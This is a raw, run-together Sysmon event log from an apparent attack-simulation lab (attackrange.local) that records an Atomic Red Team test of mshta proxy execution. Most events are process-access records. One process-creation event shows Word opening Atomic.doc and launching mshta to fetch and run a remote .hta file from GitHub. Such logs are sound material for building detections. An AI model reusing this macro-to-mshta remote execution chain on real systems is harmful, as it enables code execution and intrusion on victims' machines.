12:25:20.864{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292972Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.863{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292971Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.863{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292970Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.863{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292969Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.863{BEA10069-D4AF-6086-5601-00000000BB01}4366752C:\Windows\Explorer.EXE{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292968Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.859{BEA10069-D0C2-6086-1400-00000000BB01}3681636C:\Windows\system32\svchost.exe{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292967Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.844{BEA10069-D0C2-6086-1400-00000000BB01}3681636C:\Windows\system32\svchost.exe{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292966Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.844{BEA10069-D0C2-6086-1400-00000000BB01}3681636C:\Windows\system32\svchost.exe{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292965Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.828{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD22B1B4D2FD09D2E8FBFEA252C58AD4,SHA256=88A65DC7E869CD9FFB4039532CA5345B52BF07A30010C104C41E12F5F0B65C74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441450Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:20.611{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A27F646A85B32B40DC711A4467273397,SHA256=AD6215AF719117F621C9D85DD2B14C4F5DB10A2332DF989EE190D558D94DD3C6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292964Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.596{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292963Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.596{BEA10069-D4AE-6086-5101-00000000BB01}28123888C:\Windows\system32\taskhostw.exe{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292962Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.596{BEA10069-D4AE-6086-5101-00000000BB01}28123888C:\Windows\system32\taskhostw.exe{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292961Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.596{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+628b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292960Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.596{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bd0|C:\Windows\System32\SHELL32.dll+6286c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292959Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.596{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292958Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.596{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292957Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.480{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292956Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.465{BEA10069-D0C1-6086-0B00-00000000BB01}6407044C:\Windows\system32\lsass.exe{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292955Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.465{BEA10069-D0C1-6086-0B00-00000000BB01}6407044C:\Windows\system32\lsass.exe{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292954Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.427{BEA10069-D0C2-6086-1000-00000000BB01}9441656C:\Windows\system32\svchost.exe{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292953Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.427{BEA10069-D0C2-6086-1000-00000000BB01}9441148C:\Windows\system32\svchost.exe{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292952Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.211{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292951Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.211{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292950Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.211{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292949Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.211{BEA10069-D4AB-6086-4301-00000000BB01}33842096C:\Windows\system32\csrss.exe{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000292948Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.211{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292947Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.211{BEA10069-02A1-6088-112A-00000000BB01}65686164C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\SYSTEM32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+43ae7|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+4358a|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+44642|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+3c560|C:\Program Files\Microsoft Office\Root\Office16\AppVIsvSubsystems64.dll+3d357|C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL+100e92|UNKNOWN(00000145103363F2) 154100x8000000000000000292946Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.213{BEA10069-02B0-6088-132A-00000000BB01}972C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXEmshta.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.htaC:\Users\Administrator\Downloads\WIN-HOST-96\Administrator{BEA10069-D4AE-6086-06A6-0F0000000000}0xfa6062HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Administrator\Downloads\Atomic.doc" /o "" 10341000x8000000000000000292945Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:20.195{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-02A1-6088-112A-00000000BB01}6568C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441449Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:20.309{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7297017CBD5A4E6D8609EF400412749E,SHA256=300907F9D14E776C0E2DAAB94B6E9AE014FB3F6C12EB221969AB6BD2A1D55FEF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441448Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:20.246{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441447Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:20.246{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292979Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:21.846{BEA10069-D14B-6086-D000-00000000BB01}3836NT 